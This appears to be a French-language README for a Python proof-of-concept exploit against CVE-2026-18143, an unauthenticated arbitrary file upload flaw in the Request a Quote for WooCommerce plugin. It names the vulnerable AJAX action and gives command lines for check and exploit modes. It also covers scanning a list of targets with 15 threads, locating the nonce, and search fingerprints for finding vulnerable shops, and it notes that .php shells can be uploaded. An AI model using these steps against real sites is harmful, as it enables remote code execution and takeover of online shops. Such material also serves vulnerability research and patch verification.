
PoC Python qui vérifie et exploite CVE-2026-18143, une vulnérabilité de téléversement de fichier arbitraire non authentifié dans Addify Request a Quote for WooCommerce ≤ 2.9.2 via le gestionnaire AJAX de la popup.
PoC Python 3 pour CVE-2026-18143 dans Request a Quote for WooCommerce (woocommerce-request-a-quote, Addify / WooCommerce.com).
CVE-2026-18143 — Request a Quote for WooCommerce ≤ 2.9.2 permet un téléversement de fichier arbitraire non authentifié (CWE-434, CVSS 9.8 Critique) via afrfq_submit_quote_via_popup(). Le gestionnaire de popup appelle move_uploaded_file() en utilisant le nom de fichier brut du client sans liste blanche d'extensions ou de types MIME, écrivant dans un répertoire de téléversement RFQ temporaire accessible via le web. Les attaquants peuvent téléverser des shells .php lorsqu'une règle de devis publique utilise le flux popup multi-page. Corrigé dans > 2.9.2.
Page PoC : https://pocbit.org/pocs/cve-2026-18143
Catalogue : https://pocbit.org/pocs/
| Produit | Request a Quote for WooCommerce (Addify) |
| Chemin du plugin | wp-content/plugins/woocommerce-request-a-quote/ |
| Affecté | ≤ 2.9.2 |
| AJAX | action=afrfq_submit_quote_via_popup → admin-ajax.php |
| Prérequis | Règle de devis popup activée sur la boutique |
pip install -r requirements.txt
python poc.py -u https://shop.example --mode check
python poc.py -u https://shop.example --mode check --upload-probe
python poc.py -u https://shop.example --mode exploit --nonce YOUR_NONCE --verify
python poc.py -u https://shop.example --mode exploit --page /shop/ --verify
python poc.py --list targets.example.txt --mode check -j 15
Le nonce se trouve généralement dans le JS front-end (objet localisé afrfq) sur les pages boutique/produit lorsque le popup de devis est actif.
body="/wp-content/plugins/woocommerce-request-a-quote/"
body="afrfq"
Tests autorisés uniquement. --upload-probe / --mode exploit écrivent des fichiers sur la cible.